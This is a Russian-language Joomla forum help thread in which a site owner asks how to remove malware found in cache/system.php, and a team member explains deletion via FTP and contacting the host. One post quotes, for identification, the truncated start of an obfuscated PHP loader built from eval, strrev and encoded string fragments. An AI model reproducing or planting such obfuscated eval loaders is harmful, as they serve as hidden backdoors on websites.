Найден вирус в cache/system.php Спасите!

Тема в разделе "Вопросы безопасности", создана пользователем Nospi, 15.07.2013.

  1. Offline

    Nospi Недавно здесь

    Регистрация:
    14.07.2013
    Сообщения:
    13
    Симпатии:
    0
    Пол:
    Мужской
    Ребята, найден вирус eval(base64_decode( в папке cache/system.php на ней стоят права 644. Помогите пожалуйста советом как от него избавиться.....
     
  2.  
  3. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 036
    Симпатии:
    518
    Пол:
    Мужской
  4. Offline

    Nospi Недавно здесь

    Регистрация:
    14.07.2013
    Сообщения:
    13
    Симпатии:
    0
    Пол:
    Мужской
    Пробовал, может что не так делаю, в файловом менеджере выделяю и нажимаю делит, но после закрытия файла не сохраняется. Да и права какие то странные, подскажите что жать?
     
  5. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 036
    Симпатии:
    518
    Пол:
    Мужской
    Выделил файл- клик правой клавишей,для вызова контекстного меню - удалить.
    Клиент ФТП- FileZilla.
    В панелях хостинга есть справки/помощь.
    И если не можешь удалить файл с вредоносным кодом,то обращайся к хостеру.Он поможет,это в его интересах,чтобы зостинг был чистый.
     
    Последнее редактирование: 15.07.2013
  6. Offline

    Nospi Недавно здесь

    Регистрация:
    14.07.2013
    Сообщения:
    13
    Симпатии:
    0
    Пол:
    Мужской
    Вирус в файле удалил.. Вопрос, если искать его в других файлах, код его будет всегда в неизменном виде?
    еще странный файл в components/com_joomlapack/index.php вижу:

    1 <?php
    2
    3 ?>

    Что бы это значило?
     
    Последнее редактирование: 15.07.2013
  7. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 036
    Симпатии:
    518
    Пол:
    Мужской
    Модераторы- может тему пора перенести?

    Наверно для защиты от просмотра файлов в директории.
    Клубный шаблон? Откуда скачал?
     
  8. Offline

    Nospi Недавно здесь

    Регистрация:
    14.07.2013
    Сообщения:
    13
    Симпатии:
    0
    Пол:
    Мужской
    Перед тем как перенесете последний вопрос:

    в файле:

    eval($mdh($md(strrev('/0///973n3//5zD'.'EAJggRQ'.'AC'.'df1kPZVidSaW9OC'.'q'.'3LYtTj44VUK/M7p6Q'.'dNvtRHD'.'kLUxYppsNoj6iB/Bfc'.'Ryc'.'8D'.'c'.'rwrk+U8HNNZGdwTixGO9gdOwHGnoENhdq'.'NWasiE63KgfYyAR/P7KflEyoao97ZAQ'.'VMYluO8l1OJIbbUtQ'.'PWMKlEox/ke2A6j5iq'.'BhSrz5/rHImOjjRJ68lvFsGnb+gunBjoAXtZTTD'.'HWrC'.'imMre2AfA2SZrlEuE5KRumL2D'.'AfdgajWhPq'.'JapQ'.'8oPFD'.'LQ'.'YSzD'.'WvaAj0ItsBQ'.'fBL7Vbq'.'Rp8RxtVHWgLTldGhuMwD'.'C'.'5ED'.'D'.'jkZBThBXIEEBej85Bo4LX4V/wRkfyJRvJdq'.'SW94lc'.'7IgFAV1e6t8IumL676yY5/91p+o9WL3BZnfgyJkPfwwUhq'.'S5mzbjdWC'.
    и т.д.

    тоже ВИРУС?
     
  9. Offline

    alisa_kms Недавно здесь

    Регистрация:
    29.04.2013
    Сообщения:
    4
    Симпатии:
    0
    Пол:
    Женский
    доброго всем дня. извиняюсь если не мне не сюда, но уже не знаю что делать. у нас есть сайт, но при переходе на страницу, где надо вводить логин и пароль для того чтобы попасть туда где мы добавляем, изменяем, удаляем файлы, у нас просто белая страница без формы для ввода данных, что делать??? как ее вернуть???=(((((помогите пожалуйста!!!!=(((((((
     
  10. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 036
    Симпатии:
    518
    Пол:
    Мужской
    Сравни этот файл,а лучше сразу замени на стандартный файл из архива расширения.

    alisa_kms,
    Не сюда вопрос. Хостер закрыл админку на твой сайт.Стучи к хостеру или меняй на нормального хостера,который может обеспечить работу хостинга.
     

Поделиться этой страницей

Загрузка...